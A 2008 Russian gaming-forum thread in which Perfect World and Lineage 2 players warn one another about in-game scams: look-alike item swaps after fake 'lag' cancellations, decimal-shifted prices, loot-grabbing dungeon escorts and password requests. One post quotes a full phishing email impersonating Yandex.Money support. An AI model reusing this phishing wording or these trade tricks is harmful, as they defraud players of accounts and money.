Но понятно что это требует серьезных трудозатрат со стороны администрации, думаю минимум 15 минут потратит админ на разбор каждого случая. А если наказание не будет серьезным то случаев будет масса. И будут ошибки с никами и вообще тупые жалобы типа "памагите миня киданули. вася." И ошибки и несправедливые наказания при таком "разбирательстве" возможны. И даже если услуга будет платной то вполне возможно что кидала в игру вносит больше чем все его жертвы вместе взятые. Поэтому вовсе неочевидно, что администрация станет разбирать подобные случаи.
А возможно данный конкретный сервер вообще не ведет таких логов или они отключены.
Вот я и интересуюсь - может кто пробовал решать так свои проблемы. Получилось или послали.
Администрация не будит просматривать кучи логов,чтобы чтото там отыскать для какогота нуба.А если сделка оформлена на форуме,то есть,я обязуюсь дать такомуто такомуто пушку погонять на две недели за 50000 юаней.Я такой такой обязаюсь заплатить бабло за аренду пухи.И админ там нацарапает свое слово.Аминь!Да будет Так!А потом кидала пуха не вернет и денег за неё не заплатит и в бан отправится.И тут уже не отвертишься ,не скажешь что хай тебе сам отдал золотую пуху безвозмездно.Придется мытся в бане.
За 2 года в линейке ни разу не подалась на всяческие разводы, хотя начинала тупым нубом. Просто когда тебя за дуру считают-это видно невооруженным глазом. А разводами как правило занимаются "школьники", молодые люди, относящие к игре более серьезно, чем она того заслуживает. Люди постарше, состоявшиеся приходят в игровой мир просто отдохнуть, им ни к чему всяческие уловки чтобы ощущать себя самыми крутыми и хитрыми.
Вот в PW я лоханулась. Как говорится и на старуху бывает проруха. Тут где-то говорилось о тупых нубах, покупающих втридорога. Видимо и себя могу причислить к таким. Захотелось мне иметь камень инвентаря. Говорили мне, что его получить можно только отправив что-то там по смс.Но вот принцип есть по жизни-никогда не вкладываюсь реалом в игру. Смысла не вижу. А тут смотрю-продают на площади города драконов. С пояснениями, мол "квест для банкира". И камушек называется "камень хранилища", красивый, синенький. Потратила все свои 150 к, а банкир камушек не берет. Остается только разводить руками. То ли камушек бракованный подсунули, то ли я что не так делаю...Хотя что можно сделать не так, сдавая квест?
А вот один знакомый рассказывал, как виртуозно разводил в линейке - обещал выслать по почте патч, чтобы чары могли любовью заниматься. (ведь ню-патч уже существовал). За это просил игровые деньги. Чисто символическую сумму. И велись. И давали..))) Для PW тема более чем актуальная со всеми этими обжиманцами и поцелуйчиками.
Farenher
20.07.2008, 22:27
За 2 года в линейке ни разу не подалась на всяческие разводы, хотя начинала тупым нубом. Просто когда тебя за дуру считают-это видно невооруженным глазом. А разводами как правило занимаются "школьники", молодые люди, относящие к игре более серьезно, чем она того заслуживает. Люди постарше, состоявшиеся приходят в игровой мир просто отдохнуть, им ни к чему всяческие уловки чтобы ощущать себя самыми крутыми и хитрыми.
Вот в PW я лоханулась. Как говорится и на старуху бывает проруха. Тут где-то говорилось о тупых нубах, покупающих втридорога. Видимо и себя могу причислить к таким. Захотелось мне иметь камень инвентаря. Говорили мне, что его получить можно только отправив что-то там по смс.Но вот принцип есть по жизни-никогда не вкладываюсь реалом в игру. Смысла не вижу. А тут смотрю-продают на площади города драконов. С пояснениями, мол "квест для банкира". И камушек называется "камень хранилища", красивый, синенький. Потратила все свои 150 к, а банкир камушек не берет. Остается только разводить руками. То ли камушек бракованный подсунули, то ли я что не так делаю...Хотя что можно сделать не так, сдавая квест?
А вот один знакомый рассказывал, как виртуозно разводил в линейке - обещал выслать по почте патч, чтобы чары могли любовью заниматься. (ведь ню-патч уже существовал). За это просил игровые деньги. Чисто символическую сумму. И велись. И давали..))) Для PW тема более чем актуальная со всеми этими обжиманцами и поцелуйчиками.
Зря паникуешь, сначала у банкира надо взять квес на этот самый камушек(квест "дилемма банкира") :)
FLUherrAD
20.07.2008, 23:18
Да он столько и стоит,сам я не покупал,денег нету.Смог только один раз ресов по квесту первому на расширение набрать и всё.Да мне както хватает вроде покачто.
А то что 150к потратила,это очень жалко...Он того не стоит
А я 2 улучшения ресами сделал, и еще камень купил - не хватает все равно места =(
Rinoa1337
20.07.2008, 23:58
А тут смотрю-продают на площади города драконов. С пояснениями, мол "квест для банкира". И камушек называется "камень хранилища", красивый, синенький. Потратила все свои 150 к, а банкир камушек не берет. Остается только разводить руками. То ли камушек бракованный подсунули, то ли я что не так делаю...Хотя что можно сделать не так, сдавая квест?
камень хранилища стоит 2.5 золотых слитка. По примерному курсу - 50к = 1 слиток, ваша покупка за 150к это отличное приобретение.
Скорее всего у вас взят квест на сбор РЕСУРСОВ для хранилища, усики, бивни, маски злодея etc. нужно его отменить, и взять квест на сдачу камня.
Но сразу хочу предупредить - проще побегать немного и к 20му лвлу уже собрать самостоятельно эти ресурсы и увеличить банк. Потом выполнить второй квест на сбор других ресурсов для банкира и ещё увеличить банк, и уже потом увеличивать банк камнем. Если отдать камень сейчас, взять первый квест на расширение банка будет невозможно! Только второй сразу
Хотя, это моё жадное мнение :) я удавлюсь за 150к )
InteksTurok
24.07.2008, 20:59
Слушайте это нормально когда предметы по разному достаются а монеты только мне сыплются? (нету сообщения типа "игрок получил стока то золота", есть тока "получено стока то золото")
DallasXIII
24.07.2008, 21:07
Слушайте это нормально когда предметы по разному достаются а монеты только мне сыплются? (нету сообщения типа "игрок получил стока то золота", есть тока "получено стока то золото")
Деньги делятся между сопартийцами поровну.
Farenher
24.07.2008, 21:25
Размечтался)) Не замечал что сыпется меньше чем в соло)
InteksTurok
24.07.2008, 22:24
А ну тогда ясно, да я нуб еще)) Я чуть играл думал что тока мне бабки капают :)
UnicornXIII
26.07.2008, 01:05
- Если вы покупаете барабан от Страдивари за лимон баксов, то вы не лох.
Все знают, что для лохов Страдивари делал скрипки, а для реальных пацанов - БАРАБАНЫ. Это к к вопросу о "руках будды".
- Теперь по поводу о "дереве за 300"... есть такое понятие как "демпинг", если ктото будет продавать древесину по такой цене, то единственный способ борьбы с ним - купить у него ВСЁ дерево и тут же поставить кота по нормальной цене.
- практически в любой ммои в пользовательском соглашении написано - "защита Вашего логина/пароля - целиком Ваша обязанность", советую выполнять этот пункт неукоснительно.
ЗЫЖ по поводу "вирусов 2го поколения, после которых надо менять ВЕСЬ комп" - очень долго смеялся, спасибо за шутку ;) Сразу вспомнился "лабиринт отражений" - там были вирусы 3го поколения, которые мозги юзерам выжигали ;)))
Rafaelle
27.07.2008, 15:58
Пытались разводить угрозой бана. Кому-то не понравилось, видите ли, как я прыгаю. Обвинили в использовании патчей на прыжки и !зум!. Как последнее он проверил я, если честно, не знаю.
Разводчик ушёл ни с чём, ибо нуб был тупее, чем он думал, и просто не знал, что такое патчи и как ими пользоваться, в итоге упёрся рогом в землю. Всё закончилось на угрозе показать скрины и пожаловаться админам. Так-то.
Из РО-шной напоролся на "вора по доверию". Состояли в одной гильде, уже долго совместно играли. У меня увели броньку с картой (+400 ХП), а у гильд-босса - шапку. Было карйне обидно(
Так что вот, не попадайтеся.
ЗЫЖ по поводу "вирусов 2го поколения, после которых надо менять ВЕСЬ комп" - очень долго смеялся, спасибо за шутку ;) Сразу вспомнился "лабиринт отражений" - там были вирусы 3го поколения, которые мозги юзерам выжигали ;)))
Зря смеетесь. Если кто знает Криса Касперского (американский хакер, не путать с Евгением Касперским), то он заявил, что нашел способ убить проц удаленно. А Крис слов на ветер не бросает. Так что добро пожаловать в эпоху вирусов второго поколения.
Rinoa1337
28.07.2008, 11:29
Криса? Да ктож его не знает! Вот только только вчера пили вместе.
ненужно паникёрство разводить.
А что Крис заинтересовался PW?
Уверен что эту тему не читают 90% нубов, но все же напишу - в игре появились продающие золото за реальную валюту. Кому интересно где - стоит бот в драконах и кричит сайт :) В общем все бы хорошо если бы не ценник - *** игровой валюты, за ***, а это (я ** точный курс русский) - около * золотых ИМ-а, которые можно продать за ***.
Вот вам и разводилы :) А ведь кто-то да купит.
Rinoa1337
30.07.2008, 23:17
Уверен что эту тему не читают 90% нубов, но все же напишу - в игре появились продающие золото за реальную валюту. Кому интересно где - стоит бот в драконах и кричит сайт :) В общем все бы хорошо если бы не ценник - *** игровой валюты, за ***, а это (я ** точный курс русский) - около ** золотых ИМ-а, которые можно продать за ***.
Вот вам и разводилы :) А ведь кто-то да купит.
Уважаемый, подобные вещи нужно обязательно скринить и отправлять в службу поддержки пользователей (http://support.nivalonline.com)
по теме разводил в игре:
спросило одно тело меня сегодня, мол, почем свой молот продашь? А молот, к слову у меня желтый, из 39 данжа форма, ну я само собой "не продаётся, адьёс", так чел сначала заявил, что он 45, затем поинтересовался где находится 39 данж :D
а потом последовало гениальное предложение:
- хочешь я тебя покачаю?
- скажи свой лог и пасс, я тебя ваще прокачаю, те понравица
чтото вроде этого :D не ведитесь, люди )
Уважаемый, подобные вещи нужно обязательно скринить и отправлять в службу поддержки пользователей (http://support.nivalonline.com)
Ник tor22 или как его там говорит что чар не первый и не последний :)
Думаю послали и без меня
Rinoa1337
31.07.2008, 00:00
Думаю послали и без меня
я на такое всегда спрашиваю: "а если каждый так подумал?"
лучше перебдеть...
fataleroid
01.08.2008, 20:27
мне такие славу богу ещё непопадались))
хотя помню..меня пытались торгом кинуть....хотели мне за 10к вещь продать...я деньги кинул...а он вещь нет..говорит мол незнаю что такое...ну я потом отменил сделку)
Rinoa1337
07.08.2008, 14:30
в чатах последнее время засилие рекламы о покупке/продаже чаров/золота и прочего за реал. :(
всю подобную рекламу следует скринить и отсылать в службу поддержки пользователей (http://support.nivalonline.com)
NiobaLUN
08.08.2008, 11:16
По поводу регистрации.
зато на юкозе админ может поменять пароль пользователя и заходить за него
Rinoa1337
08.08.2008, 11:35
зато на юкозе админ может поменять пароль пользователя и заходить за него
Админ на любом хостинге так может сделать.
Turkababa
08.08.2008, 11:45
У умного человека для форумов должен быть отдельный пароль. А я специально придумываю пароли подлиннее, благо память хорошая...
Ребята вступил я в гильдию а они тут говорят что с обычных игроков взнос размером 7000 раз в неделю Гилд мастеру мрожет ли это быть киданием?
Rinoa1337
08.08.2008, 13:49
Это обычная практика молодых кланов.
Ребята вступил я в гильдию а они тут говорят что с обычных игроков взнос размером 7000 раз в неделю Гилд мастеру мрожет ли это быть киданием?
у меня 50к в неделю...
так что не сцы
the_beginner
08.08.2008, 19:10
Поинтересуйся на что эти деньги идут, у гильдмастера.
Может, гильдмастер рассматривает клан как вложение капитала. Он потратил 100к на создание, и теперь "отбивает бабки", кладет их себе в карман (надо запостить это в "Фарм денег" :) ).
А может покупает рупоры для дальнейшего набора в клан.
Думай сам за дело ты платишь или просто так. Если просто так - то ИМХО это кидалово.
AngelFiska
15.08.2008, 16:02
Хм...и часто так в кланах взымают плату? у меня такого нет....
или это по желанию мастера о_О
Хм...и часто так в кланах взымают плату? у меня такого нет....
или это по желанию мастера о_О
Тогда как вы ставки на ТВ делаете, или ап гильдии, или другие нужды клана? Мастер со своего кармана кладет?
cachetta
16.08.2008, 05:09
Хм.. А меня только 2 раза кинули и то в совсем других играх. В разных. 1 раз одолжили шмотку и сказали что потом выкупят а не выкупили в ф баню попали а второй когда по очереди деньги и вещь передавать надо было я вещь дала - а мне денег не дали. Теперь не ведусь))
Кидал ещё веселее пкшить, чем простых игроков. Нужны лишь ники, ну и соответственно достаточно сильный перс чтобы подпалить им зад =) Если автор захочет - будет редактировать скажем первый пост, создавая что-то вроде базы лживых редисок, вряд ли их очень много будет - зато можно будет устроить что-то вроде охоты за головами, когда простые убийства и разорение достанут =)
CuRseDWolF
18.08.2008, 15:44
А исчо есть данж-кидалы которые самый полезный лут хватают после того как вас проведут я считаю такое поведение для 60+ неподобающим:no::duel:
Quetzalkoatl
18.08.2008, 20:26
Вырасти и не будь таким ) И для начала пройди один данж не овощем в хвосте хилера, а в равноценной пати. А потом честно и бескорыстно отдай лут другому овощу )
Поинтересуйся на что эти деньги идут, у гильдмастера.
Может, гильдмастер рассматривает клан как вложение капитала. Он потратил 100к на создание, и теперь "отбивает бабки", кладет их себе в карман (надо запостить это в "Фарм денег" :) ).
А может покупает рупоры для дальнейшего набора в клан.
Думай сам за дело ты платишь или просто так. Если просто так - то ИМХО это кидалово.
так этот ГМ и сказал зачем взносы, умные ГМ которые создают ГИ с взносами уже сделали шаблон в блокноте, типа такого: взносы идут на лвл гильдии, на захват территорий, хирки для данжей и т.д.
так что спрашивать бесполезно
AlMaXDjs
22.08.2008, 00:57
Я очень осторожен и предусмотрителен! Поэтому ни разу не был кинут!
И вообще... Кидают тех кто даёт себя кинуть! Делайте выводы...
exxtassy
22.08.2008, 06:27
главное не вести себя как лох и спрашивать у людей (не все динамо) и все будет ОК
RunAwayAngel
22.08.2008, 17:56
Ну ненаю....у меня ничего подобного не было....и из шопа торгую и в данжи вожу...все норм))
А в моём клане 50к налог.
И ещё мы забираем шмот и заставляем жечь хирки на тв,ужос!)))
мой тебе совет:
Сразу ставь гилд-мастера на место,заяви ему что платить не собираешься и намекни что ему обязательно надо купить тебе голд-сет в подарок, иначе ты его опять разоблачишь на форуме.)
вчера увидел неко-шоп над которым гласила надпись: "продажа золото 1з=45к" подошёл посмотреть что за фигня ) и вижу что там продаются золотые слитки за 45к ) и какие нить нубы обязательно купят ведь ^__^. Вот возник вопросик, считается ли это кидаловом? ))
kantor59
22.08.2008, 19:24
Кидание при продаже коробок с перьями феникса и источниками силы. Например на серваке Орион коты "Ольга" и др. продают коробки по 30 -40 к. Во всех коробках , что они продают лежит 10 перьев и 10 источников! Дело в том, что коробки стекуются в рюкзаке по принципу равного кол-ва перьев и источников. То есть коробки с 10 перьями не могут лежать в одной пачке с коробками по 20 и 30 и т.д. Таким образом, открыв Х шоповских коробок- сюрпризов, получаем раздельные пачки 5 штук с перьями и 5 пачек с источниками. В каждой пачке лежат коробки с ОДИНАКОВЫМ количеством перьев или источников ! Открыв по одной коробке из каждой пачки, знаем где пачка с 10 перьями, где с 20 и т.д. Ну а дальше открывают коробки где 20 и больше перьев. А коробки, в которых по 10 штук - выставляют на продажу. Чистый лохотрон, используют глупость китайцев при идентификации коробок.
_Dervish
23.08.2008, 06:39
Кидание при продаже коробок с перьями феникса и источниками силы.....
Главное вовремя написанно. После последнего патча это уже не актуально, так как теперь в названии коробки указывается количество перьев или источников...Но собственно за 4 недели все кто хотел сделали на этих коробках себе состояние. Остается только удивляться бесконечному оптимизму людей которые покупая коробки по заниженной в 1,5 раза цене надеялись получить что-то кроме 10 перьев
Kompas89
24.08.2008, 12:17
Вчера видел как одна дефачка купила лопату за 25к.О_о
вывод:читайте,а не пролистывайте ОБУЧЕНИЕ и будет вам счастье.И не будет воплей в чат типа :"ГДЕ КУПИТЬ ЛОПАТУ?!" or "А ГДЕ ТУТ СКИЛЫ УЧАТ?!".
На ресурсах нагревать пытаются периодически - опять же классический трюк на невнимательность, когда меняют местами цену с количеством и орут мол дешево продаю, как приглядишься совсем не та цена о которой говорят. Вообще стараюсь самостоятельно все добывать и добиваться, в редком случае покупаю (пока левел не дает разгуляться на широкую ногу да и в рынке не совсем ориентируюсь) да и не доверяю особо игрокам, нубов мало кто любит. Почти как в песне:
"Какое небо голубое,
Живут на свете эти трое.
Им, слава богу, нет конца, Как говорится, зверь бежит -
И прямо на ловца!"
McMelan3d
24.08.2008, 17:17
На ресурсах нагревать пытаются периодически - опять же классический трюк на невнимательность, когда меняют местами цену с количеством и орут мол дешево продаю, как приглядишься совсем не та цена о которой говорят.
Это один из стандартных способов заработка в PW. Получается, Вас нагревают в магазинах (коты) когда вы покупаете пиво (или что-то другое конечн), т.к. они скупают его у соответствующих компаний (аналог в PW шоп или коты)хD
в редком случае покупаю
На это, поверте, оч. много и расчитывают, десятки людей подходят и докупают нехватающий рес, примерно рассуждая "Вот барыга! А лан... всеравно один нада"
Меня как-то раз в линейке разводили с точкой пухи. Был в пати и поц сказал, типа если пуху несколько раз взять\поднять, то он точится будет.Я разумеется стал её кидать и поднимать:) хорошо хоть лут был выставлен по "поднявшему"
Ещё есть развод при торговле (опять же опыт из ла2)
Первый развод это когда пишут что продают одну вешь, но суют другую, просто картинка одинаковая.
Второй: пишут что продают, а на самом деле покупают, и наоборот.
ЗЫ тему не читал, мб повторил кого-то :D
заметила трюк с яшмой когда все виды ставят к примеру : по 1,6к а один вид по 16к или 160к.
но на такое только очень невнемательный человек поподётся.
myrkiska1
27.08.2008, 20:04
Вот еще одна разновидность для наивов который раздают свое мыло друзьям с которыми качаются.
На одно из моих мыл для спама прислали,вирус снимает все пароли и т.д.
От кого:
support.money@yandex.ru
Кому: .....
Дата: 26 Авг 2008 08:15:54
Тема: уведомление
Добрый день!
Кто-то (возможно Вы) указал адрес .............. как
принадлежащий пользователю Яндекс.Денег. Если Вы этого не
делали, то просто УДАЛИТЕ это письмо, и мы никогда не будем использовать
этот адрес.
В системе Яндекс.Деньги на вас поступила претензия,
в связи с чем ваш аккаунт заблокирован до разъяснения ситуации.
Для просмотра перейдите по этой ссылке
в ссылке вирус))))
Это письмо написано роботом. Отвечать на него не нужно.
С уважением, Служба поддержки Яндекса, suport@yandex.ru
Сами понимаете что возможны варианты с любыми платежными системами,после просмотра ссылки у вас не будет ни игровых аккаунтов,ни денег.
На даного не товарища было отослано письмо в сапорт почтовой службы яндекс.
vinchencefrolo
30.08.2008, 09:58
Я вообще новичек в подобных играх. Раньше не играл никогда... Второй день тока. Вчера в Городе Перьев увидел чувачка с черными крыльями, тоже захотел такие. Спросил его (громко), где он достал, а рядом другой ответил, что он продает. Блин, имени не запомнил. По пять штук продавал. Стали меняццо, ну денежков я положил, смотрю, а он, цуко, не кладет крылышки-то... Жду, не соглашаюсь, пока не положит... Ничего не происходит... Потом он сделку отменил, сказал, что не получилось, типа глюк в игре )))). Я-то не знал, что тут кидают, но мысль в процессе закралась... Денгов он так от меня не получил. Они по ходу с крылатым в паре работают, рядом ходют. Теперь буду бдить, чего и всем желаю.
Я вообще новичек в подобных играх. Раньше не играл никогда... Второй день тока. Вчера в Городе Перьев увидел чувачка с черными крыльями, тоже захотел такие. Спросил его (громко), где он достал, а рядом другой ответил, что он продает. Блин, имени не запомнил. По пять штук продавал. Стали меняццо, ну денежков я положил, смотрю, а он, цуко, не кладет крылышки-то... Жду, не соглашаюсь, пока не положит... Ничего не происходит... Потом он сделку отменил, сказал, что не получилось, типа глюк в игре )))). Я-то не знал, что тут кидают, но мысль в процессе закралась... Денгов он так от меня не получил. Они по ходу с крылатым в паре работают, рядом ходют. Теперь буду бдить, чего и всем желаю.
Никакие крылышки кроме белых до 30-го уровня ты не оденешь. А глюки со сделкой и правда бывают.
vinchencefrolo
30.08.2008, 10:40
Про трецатый уровень я уже узнал, но тогда он сказал, что легко одену, да и сделку несколько раз провести пытались...
Незнаю писали об этом или нет но к кидалам можно на 100% отнести водяших в данжи:
1. И самое безобидное это то что из выпавших вещей вам ничего недостанется кароче вас оберут и даже захудалой тряпки неоставят.
2. На примере 39 данжа. Вас предлагают провести с вином и быстро. Неведитесь, используете вино большая часть в том числе и квестовых мобов здохнет данж пробежите но квест нездадите.
З. Помните уважаемые новички пока вы невставили знак свами будут как с младенцем после того как знак вставлен вы для них меньше чем ничто.
VeseliyRoger
30.08.2008, 12:37
Я не буду комментировать господина Tirik, но раз уж речь зашла о данжах, напишу свои наблюдения. Мне не нравятся сообщения типа "Проведём в данж. Весь лут ВАШ" Нифига они не отдают. Они всегда ставят в пати распределение лута случайным образом. И, хотя они не подбирают лут в данже (а этим, как известно, занимается клиент), почти весь лут достаётся им.
Quetzalkoatl
30.08.2008, 14:03
Фр. Опять вылезли злостные защитники прав нубов, которые за месяцы игры не поднимаются выше 30 левела но все-привсе знают о злобных хаях, которые обманывают бедных несчастных нубов, отбирают лута на 2-3k, которые выпали в данже.
Хотя, тупым, криворучим, нифига не умеющим и постоянно лезущим на рожон нубам так и надо. Тратить на них свое драгоценное время, нервы и силы, а потом ещё отдавать лут? Ха-ха.
В общем, если кто-то в упор не желает понимать, что копеечный фиолет и низкоуровневые ДК нужны только оооочень жадным людям, то что-то доказывать бесполезно. Обычно такие люди начинают сами водить по данжам и в точности копировать действия так порицаемых ими хаев - подставлять клиента, зажимать лут и т.п.
VeseliyRoger
30.08.2008, 14:07
Ты бы не обобщал, а? Крутой папка... Я, например, уже давно за 30, давно за 40 и т.д.... И в данжи водил не раз. Пускай берут лут сколько влезет, но тогда пускай не кричат, что всё отдадут клиенту.
Rinoa1337
30.08.2008, 14:12
фиолет из 19-го кстати таки бьётся на миражи :)
Какой глазастый даже уровень разглядел только вот если тебе кроме как просиживать день за днем штаны перед компьютером набивая свои драгоценные уровни больше делать нечего то не надо срывать свою несостоятельность на нубах.
Кроме того, тема о кидалах и это один из видов о котором должны знать, так что не надо плеваться в бешеном припадке и орать что нубы вас достали без них ты свои уровни и золотой шмот только во сне увидишь.
копеечный фиолет и низкоуровневые ДК нужны только оооочень жадным людям
С этим не поспоришь, вы затопчете любого нуба за эти копеечные шмотки.
И кстати там же написано не только о том что тырят весе шмотки.
karbofos127
30.08.2008, 17:48
Да уж..орут в чат "весь лут ВАШ!",а на деле как-только босса убьют,жадно тыкают на бодбор дропа...
cityperm
30.08.2008, 19:00
народ смотрите цены на яшме !!! кто делает квест яшму
очень часто стало попадаться яшма по 17к - к примеру 4 яшмы по 2к а одна 17
и так у многих котов ( берите у одного 4 камня и у другого 1 )
PS. Незнаю мне отдавали весь лут из данжей, и сколько мы водили тоже отдавали так как главное экспа, а не копеечный лут
( так как за час можно нафармить не напрягаясь 200-400к )
эт нижний пост кому адресован ?
если мне то к сожалению я еще всего 49+ ( фармить надо ресы ДК и падают часто и сдать можно по дороже, а не плакать что денег нету )
а лучше сами проходите данжи с теми кому тоже надо в тот данж ( когда сервер открыли хаев небыло, а данжи проходили и не плакали лут не дали )
blade009
30.08.2008, 19:43
Если вам предлагают купить клан за дёшевую цену и при этом представляются братом администратора этой игры - не соглашайтесь, он всего лишь мошенник. Сначало он вас возьмёт в клан, после возьмёт ваши деньги(якобы сделает вас мастером клана), а после вас просто выганит из клана!!!!
НЕ ПОПАДАЙТЕСЬ НА УЛОВКИ МОШЕННИКОВ!!!!!!
asromafan
31.08.2008, 00:17
Про яшму...
у кота 4 яшмы 2 лвл стоит 1700 а одна 17000
долго тупил почему так много денег в итоге потом врубился.
Будте осторожны
плин жесть
братом администратора игры
это слишком))
LeonidEst
31.08.2008, 03:31
У всех админов во всех играх по 100 братьев, соседей, корешей, жён и тд)))
по поводу лута в данже)
када меня таскали на 39. танк при смерти боса ))) лихо так рвёт пати и тупа собирает лут))) а танк был 70 лвл))) вот и все базары) хотя лута то там и не было почти )))) ну да сам факт)))
во что все это превратится когда эту кодлу нубиков будут водить по 69 79 и ВНЕЗАПНО выпадет голд.
cityperm
31.08.2008, 13:26
Значит такие пати и кланы берете что вас кидают, Про голд и форму в 39 выпало 2 формы на амулеты ( по 500к-700к продают ) будете смеяться :lol: но мне отдали,
LilianRegen
31.08.2008, 13:43
ну плин..кидалово было и будет..надо ж знать того, с кем собираешься идти=) вот и не будет тада кидалова...
asromafan
31.08.2008, 15:06
а какая ги водила??
Кидалы есть и будут в любых играх, но от себя добавлю... Я не в одной( в которых играл) и в жизни никого не кинул... И не собираюсь кидать!!
Про яшму...
у кота 4 яшмы 2 лвл стоит 1700 а одна 17000
долго тупил почему так много денег в итоге потом врубился.
Будте осторожны
Емана, народ, какие 1.7к за яшму? А пробежать 10 метров до торговца, а потом еще 5 метров до алхимика и самому скрафтить ту же яшму примерно за 1.5к за камень 2 лвл не судьба? Экономия 1к. Для кого мелочь, а для кого и нет. Имхо.
По поводу развода на вещи с похожими иконками.
Очень уж один нубо-амулет похож знак серебряного дракона (прям один в один). Не отличишь пока на описание не посмотришь. Развод простой и расчитан тока на невнимательных игроков.
-Куплю знаки серебряного дракона!! (Кричите вы в чат).
-По чем купишь? (Обычно соглашаются на любую цену, особо наглые могут поторговаться).
-У меня тока один( или последний) остался. (Говорит тебе разводила).
Дальше все просто: Торг-> Выкладываем денежки-> получаем товар-> и, о боже, обнаруживаем что нас обманули. Вот и все.
Народ реально на этом зарабатывает, и даже имеет наглость открыто тебе потом заявлять об этом. Меня за один вечер дважды пытались так развести. Один удачно, ибо невнимателен был 8)
Ники: ЗлоДей (вроде) этот выше 30 лвл (можно ПК ;) )
Второй тоже что-то со злом ник связа,н типа злО..... Этот вообще 28 был (даже не убьешь)
В общем будьте бдительны дамы и господа. Зло не дремлет 8)
Davaeorn19
01.09.2008, 15:30
В PW кинуть при обмене могут только самых прожженных нубов, ибо прикручено двойное подтверждение обмена. Ну а что можно взять у нубов? 100 денег?
Такое во многих играх есть!
MisterNOX3
01.09.2008, 16:10
Такая ситуация: У меня был друг - Shamimary, я ему ресы на крафт дал а он свалил побыстрее пока я ждал !!! Ну потом с ГильдМастером его поймали, оказалось перса с продажи угнали, аккаунт взломали и налошили людей !!! Больше я крафтерам не доверяю)))
Вопщем мораль:
1) выкладывают кучу денег в трейд - смотрим сколько атм. И желательно не первые 1-2 цифры, а еще и количество нулей посчитать.
2) выкладывают вещь в трейд - посмотрите ЧТО это - яйцо рарного мишки или малахитового мотыля вам пытаются за 2кк загнать, ну и другие аналоговые формы, как уже говорили - нубоперевязь 4 левла или серебряный знак дракона. Причем отлично действует такое: трейд, вы кладете деньги, вам знак (серебяный) - проверяете, все правильно, конфирм, сделка отменилась - партнер жалуется на лаги, провайдера, кривой патч игры и др. Мнова трейд, опять кладет серебяный знак, все верно, вы кладете деньги - отмена сделки ДА ЧЕ ТАКОЕ ЛАГАЕТ ЖУТКО пишут вам в пм. Снова... такая же история. И вот когда вы задолбаетесь окончательно, вам в трейд кидают эту самую нубоперевязь, вы уже задолбались провернять, да не станет же он обманывать, ну лагает - кидаете деньги, конфирм. Поздравляю, вас кинули.
СКОЛЬКО БЫ НЕ БЫЛО ТРЕЙДОВ ПРОВЕРЯТЬ НАДО ВСЕГДА. Даже если у напарника по трейду срочно убегает суп на плите и он вас жутко торопит)
Хочу рассказать про кидалово наоборот.
Я договорилась продать за символическую плату ресы для ДК своему соклановцу (если кому интересно всего 500 юаней, хотя может это для некоторых и дороговато). Встретились, я ей всё передала и с удивлением потом обнаружила что вместо 500 монет мне дали 3000, приятно было, я ещё спросила не перепутала ли она чего, но она повысила сумму от чистого сердца. Вот и так бывает.
Вопщем мораль:
1) выкладывают кучу денег в трейд - смотрим сколько атм. И желательно не первые 1-2 цифры, а еще и количество нулей посчитать.
2) выкладывают вещь в трейд - посмотрите ЧТО это - яйцо рарного мишки или малахитового мотыля вам пытаются за 2кк загнать, ну и другие аналоговые формы, как уже говорили - нубоперевязь 4 левла или серебряный знак дракона. Причем отлично действует такое: трейд, вы кладете деньги, вам знак (серебяный) - проверяете, все правильно, конфирм, сделка отменилась - партнер жалуется на лаги, провайдера, кривой патч игры и др. Мнова трейд, опять кладет серебяный знак, все верно, вы кладете деньги - отмена сделки ДА ЧЕ ТАКОЕ ЛАГАЕТ ЖУТКО пишут вам в пм. Снова... такая же история. И вот когда вы задолбаетесь окончательно, вам в трейд кидают эту самую нубоперевязь, вы уже задолбались провернять, да не станет же он обманывать, ну лагает - кидаете деньги, конфирм. Поздравляю, вас кинули.
СКОЛЬКО БЫ НЕ БЫЛО ТРЕЙДОВ ПРОВЕРЯТЬ НАДО ВСЕГДА. Даже если у напарника по трейду срочно убегает суп на плите и он вас жутко торопит)
Довольно частый и распространенный фокус в мморпг
Еще есть люители кидать трейд у завскладом. У банкира (вх в ла) часто народ обменивается чем-либо с сокланами, когда там толпа народа фик кого разглядишь, и многие недобросовестные личности этим пользуются.
Рецептов мало и они просты.
1. смотрите, кто кинул вам торг
2. смотрите что вам дают
3. смотрите, сколько вам дают
4. не доверяйте свои вещи кому попало.
Kobold1986
05.09.2008, 13:08
Последнее время появились еще нехорошие тенденции продавать слиток чистого золота (который используется как ресурс для драконьего квеста) под видом золотого слитка для торговли с шопом. Стоит лавка, в ней лежат слитки чистого золота(дк квест) и продаются по 45к. Ни в коем случае не берите. Если хотите что то купить из шопа ищите продавцов. В "неправильных" слитках при описании внизу есть подпись бирюзовым цветом : используется для квеста поиск драконов Я цы 31. Если вы видите эту надпись при наведении курсора на слиток будьте уверены - то что вам предлагают не является золотыми слитками, за которые покупаются вещи из шопа.
По моим скромным наблюдениям золото можно купить только на ауке, нет разве? В смысле шоповское
snohodets
05.09.2008, 23:10
заметил кидал которые знаки для квестов 60+ уровня продают, типа ето для данжа, всё выглядет премерно так:
Kompas89
05.09.2008, 23:17
на яшме недавно чуть не попался)какаято сволочь женского персонажа(сид),продовала яшму по 700,а одну по 7 000.хорошо хоть заметил,а то обычно оптом скупаешь и автоматом тыкашь "ОК".БУДЬТЕ ВНИМАТЕЛЬНЫ.
Rinoa1337
05.09.2008, 23:18
было выше уже вообщето
BloodyAries
06.09.2008, 16:36
Так вот как стронги теперь на жизнь зарабатывают )))
заметил кидал которые знаки для квестов 60+ уровня продают, типа ето для данжа, всё выглядет премерно так:
Аналогично - тоже не однократно наблюдал котов, которые продают знаки контрактника по 40к за 60 лвл. Реальная Цена которых 12400 юань если не ошибаюсь
Мне тут асю скинули 100 рублей меняют на 1 лимон юаней в игре!
Бред ведь?
respect13
08.09.2008, 14:32
не только бред, но и баномнаказуемое деяние. скрин в техподдержку
the_beginner
08.09.2008, 17:22
Я договорилась продать за символическую плату ресы для ДК своему соклановцу (если кому интересно всего 500 юаней, хотя может это для некоторых и дороговато).
Кстати ресы для ДК ты можешь сдать НПЦ дороже чем по 500. Кому дороговато - посылай сразу в лес. Хотя сокланам и бесплатно отдают...
А я часто пытался дарить нубам нахаляву яица пэтов которые мне уже не нужны. Просто бывает место в инвентаре заканчивается и для нового пэта клетку нужно освободить а старое яицо деть некуда. А продавать какогонть варвара горного за 80 золота вендору бессмысленно. Хочу помоч человеку который ходит с какимнь непроскилованным волком или скорпионом а он не берет((( Типо че те от меня надо или просто не отвечает и убегает) Никто уже не верит в человеческую добрату и все думают что это развод)
